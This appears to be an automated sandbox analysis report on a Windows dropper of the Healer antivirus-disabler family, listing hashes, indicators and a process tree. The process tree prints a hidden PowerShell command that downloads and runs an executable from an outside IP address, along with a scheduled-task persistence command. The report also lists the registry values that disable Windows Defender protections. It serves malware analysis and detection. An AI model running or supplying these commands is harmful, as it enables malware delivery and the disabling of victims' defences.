Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
16-02-2025 02:48
Static task
static1
Behavioral task
behavioral1
Sample
83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe
Resource
win7-20240903-en
General
-
Target
83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe
-
Size
938KB
-
MD5
91c52c6849af5fe67eb447e6ad66556f
-
SHA1
1ebf8b013ae9b52326be7196f4a04ab4aae3451c
-
SHA256
83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9
-
SHA512
8a90802fa783c434307c42b84d599e779e2582387f4349074429ff1aa9df2059ec2fffd723ac7e1be2d8fecbfb0cc450f5c9a78108acfd9c4d407c777e07d6e6
-
SSDEEP
24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8aesl:sTvC/MTQYxsWR7aes
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Signatures
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2608-15-0x00000000013A0000-0x00000000017FC000-memory.dmp healer behavioral1/memory/2608-16-0x00000000013A0000-0x00000000017FC000-memory.dmp healer behavioral1/memory/2608-20-0x00000000013A0000-0x00000000017FC000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2852 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2852 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 4 2852 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE -
Executes dropped EXE 1 IoCs
pid Process 2608 TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE -
Loads dropped DLL 2 IoCs
pid Process 2852 powershell.exe 2852 powershell.exe -
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2608 TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2316 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2852 powershell.exe 2852 powershell.exe 2852 powershell.exe 2608 TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE 2608 TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE 2608 TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 2608 TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2520 wrote to memory of 1736 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe 30 PID 2520 wrote to memory of 1736 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe 30 PID 2520 wrote to memory of 1736 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe 30 PID 2520 wrote to memory of 1736 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe 30 PID 2520 wrote to memory of 1752 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe 31 PID 2520 wrote to memory of 1752 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe 31 PID 2520 wrote to memory of 1752 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe 31 PID 2520 wrote to memory of 1752 2520 83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe 31 PID 1736 wrote to memory of 2316 1736 cmd.exe 33 PID 1736 wrote to memory of 2316 1736 cmd.exe 33 PID 1736 wrote to memory of 2316 1736 cmd.exe 33 PID 1736 wrote to memory of 2316 1736 cmd.exe 33 PID 1752 wrote to memory of 2852 1752 mshta.exe 34 PID 1752 wrote to memory of 2852 1752 mshta.exe 34 PID 1752 wrote to memory of 2852 1752 mshta.exe 34 PID 1752 wrote to memory of 2852 1752 mshta.exe 34 PID 2852 wrote to memory of 2608 2852 powershell.exe 37 PID 2852 wrote to memory of 2608 2852 powershell.exe 37 PID 2852 wrote to memory of 2608 2852 powershell.exe 37 PID 2852 wrote to memory of 2608 2852 powershell.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe"C:\Users\Admin\AppData\Local\Temp\83d49a58f4c4910aed8ca2c8235a4008faf8895785a1efb8580fdd6f03ae0ef9.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn hmDWSmaSlMs /tr "mshta C:\Users\Admin\AppData\Local\Temp\3Axhwn1li.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn hmDWSmaSlMs /tr "mshta C:\Users\Admin\AppData\Local\Temp\3Axhwn1li.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2316
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\3Axhwn1li.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'S4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Users\Admin\AppData\Local\TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE"C:\Users\Admin\AppData\Local\TempS4P99COGFJXUK0OSPBVCQRPCQQEKF93Z.EXE"4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
6Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
726B
MD53d308ff94efd143ec10fc3369622b67b
SHA112adca67bfa3007ec6b9106ac17931557f24dcee
SHA25683dd31089140ed3c299c2776383e89d1dd765ad21b78d8186125c446ea5bdf77
SHA51297141120cf4d037c583b1bca9c10bfee4843a47406295b355505f63dbbbaa349f580f96bab18778c6de5f3f1d87c16a065743b3ccf7f90205e048871e5d380fb
-
Filesize
1.7MB
MD5716622b15cee226d3531e49f8862c429
SHA157ae6d04adc55a3b807a90617db281f3fb1d3d6c
SHA256462e41456b5997aeba1a0da5b2196fe6a49ca7c0bbbd21e6f2fbbe9760f77bf2
SHA512d7b0260a9544d3161455c7be0e93cd5d618999aea1e36907e59f0e44f609f95c567b15cdbc7374d61f262ddbc53682fae48ee2e90b74f838303f720244af2d80